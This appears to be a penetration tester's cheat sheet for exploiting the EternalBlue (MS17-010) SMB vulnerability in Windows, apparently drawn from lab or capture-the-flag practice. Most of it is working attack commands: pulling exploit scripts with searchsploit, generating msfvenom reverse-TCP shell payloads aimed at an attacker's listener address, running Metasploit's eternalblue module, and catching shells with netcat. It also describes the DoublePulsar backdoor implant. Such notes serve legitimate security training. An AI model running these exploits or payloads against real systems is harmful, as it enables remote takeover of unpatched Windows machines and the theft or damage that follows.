Eternal Blue - Exploits
Double Pulsar #
- A sophisticated backdoor implant which serves as a loading dock for other exploits
- RAM-resident implant
- Removed when system is rebooted?
- Once installed on victim system, it can receive additional malwares and remote commands
- Can also infect RDP
- Here is an example detection script
42315.py #
- Seems not working for windows xp
# Get mysmb module
wget https://raw.githubusercontent.com/worawit/MS17-010/master/mysmb.py
# Install dependencies
virtualenv -p py2 virtualenv_eternalblue
source virtualenv_eternalblue/bin/activate
pip install impacket
searchsploit -m 42315.py
# Optional - add username pass (use this if
# anonymous login doesn't work)
(virtualenv_eternalblue) ➜ relevant cat 42315.py| egrep '^(USER|PASS)'
USERNAME = 'Bob'
PASSWORD = '!P@$$W0rD!123'
(virtualenv_eternalblue) ➜ relevant
# Run
python 42315.py 10.10.82.56
42031.py #
- Seems not working on windows xp
- Also crashes “Windows 7 Professional 7601 Service Pack 1” (HTB Blue)
# Setup similar virtualenv with 42315.py
searchsploit -m 42031.py
# Update credentials
(virtualenv_eternalblue) ➜ relevant cat 42031.py | grep login_standard
conn.login_standard('Bill', 'Juw4nnaM4n420696969!$$$')
(virtualenv_eternalblue) ➜ relevant
# Generate shell code file
msfvenom -p windows/shell/reverse_tcp LHOST=10.11.40.33 LPORT=4444 -e x86/shikata_ga_nai -f exe -o eternalblue.exe
# Run
python 42031.py 10.10.177.9 eternalblue.exe
# NOTE: This doesnt work for windows server 2016
Metasploit #
- Seems the most stable
# If victim is vulnerable to ms17-010 eternalblue,
# try to use metasploit. NOTE: if this fail on first
# time try running it a couple more times.
msf> use windows/smb/ms17_010_eternalblue
msf> set rhosts 10.10.10.13
msf> set lhost tun0
msf> set payload windows/x64/shell/reverse_tcp
msf> run
# Try upgrading to meterpreter shell
send_and_execute.py #
- Versions tested:
- Windows 7 Professional 7601 Service Pack 1 (HTB Blue)
- Get
mysmb.py
here - Generate payload
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.51 LPORT=4444 EXITFUNC=thread -f exe -a x86 --platform windows -o ms17-010.exe
- Open netcat listener
- Run
send_and_execute.py
. Get it here.
python send_and_execute.py legacy ms17-010.exe
Troubleshooting #
- If you get permission errors on named pipes, try changing usernames to
\
and password blanks
USERNAME = '\\'
PASSWORD = ''